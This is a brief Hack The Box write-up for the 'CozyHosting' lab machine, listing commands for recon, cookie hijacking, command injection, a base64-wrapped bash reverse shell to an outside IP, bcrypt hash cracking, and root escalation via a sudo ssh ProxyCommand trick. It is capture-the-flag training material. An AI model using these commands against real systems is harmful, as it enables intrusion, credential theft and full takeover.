CozyHosting - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.11.230
- Add domain to local DNS
echo "10.10.11.230 cozyhosting.htb" >> /etc/hosts
- Whatweb
whatweb http://cozyhosting.htb
- Dirsearch
dirsearch -u http://cozyhosting.htb
Exploitation
- Cookie Hijaking
- RCE
We can see the output command in the error
tcpdump -i tun0 icmp
We can bypass whitespaces with IFS variable
- Send reverse shell
echo "bash -c 'bash -i >& /dev/tcp/10.10.16.2/9000 0>&1'" | base64
Post-exploitation
- Inspect .jar file
python3 -m http.server 8000
curl -o cozy.jar http://10.10.11.230:8000/cloudhosting-0.0.1.jar
- Connect to Postgresql Database
jd-gui
psql -h localhost -U postgres -d cozyhosting
select * from users;
$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6e
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
- Pivoting
su josh
- Sudoers
sudo -l
sudo ssh -o ProxyCommand=';bash 0<&2 1>&2' x
